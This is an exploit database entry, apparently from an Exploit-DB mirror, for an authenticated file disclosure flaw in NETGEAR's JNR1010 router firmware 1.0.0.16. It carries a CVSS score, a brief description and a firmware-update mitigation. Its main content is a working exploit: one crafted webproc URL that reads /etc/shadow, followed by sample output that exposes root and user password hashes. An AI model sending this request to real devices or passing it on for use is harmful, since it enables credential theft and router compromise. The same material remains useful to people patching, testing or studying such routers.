NETGEAR ADSL ROUTER JNR1010 1.0.0.16 Authenticated Remote File Disclosure

vendor:

JNR1010

by:

Todor Donev

8,8

CVSS

HIGH

Authenticated Remote File Disclosure

200

CWE

Product Name: JNR1010

Affected Version From: 1.0.0.16

Affected Version To: 1.0.0.16

Patch Exists: YES

Related CWE: N/A

CPE: h:netgear:jnr1010

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2016

NETGEAR ADSL ROUTER JNR1010 1.0.0.16 Authenticated Remote File Disclosure

A vulnerability in NETGEAR ADSL Router JNR1010 1.0.0.16 allows an authenticated remote attacker to disclose sensitive information from the device. By sending a specially crafted HTTP request to the web server of the device, an attacker can access the /etc/shadow file, which contains the hashed passwords of all users on the device. This vulnerability affects NETGEAR ADSL Router JNR1010 1.0.0.16.

Mitigation:

Users should update their devices to the latest version of the firmware to mitigate this vulnerability.

Source

Exploit-DB raw data:

#!/bin/sh
# 
#  NETGEAR ADSL ROUTER JNR1010 1.0.0.16
#  Authenticated Remote File Disclosure
#
#  Hardware Version:        JNR1010
#  Firmware Version:        1.0.0.16
#  GUI Language Version:    1.0.0.16
# 
#  Copyright 2016 (c) Todor Donev 
#  <todor.donev at gmail.com>
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  Disclaimer:
#  This or previous programs is for Educational 
#  purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the 
#  fact that Todor Donev is not liable for any 
#  damages caused by direct or indirect use of the 
#  information or functionality provided by these 
#  programs. The author or any Internet provider 
#  bears NO responsibility for content or misuse 
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact 
#  that any damage (dataloss, system crash, 
#  system compromise, etc.) caused by the use 
#  of these programs is not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#  Thanks to Maya Hristova that support me.  

http://USER:PASSWORD@TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&var:language=en_us&var:language=en_us&var:menu=advanced&var:page=basic_home

#  #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#  root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#  #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::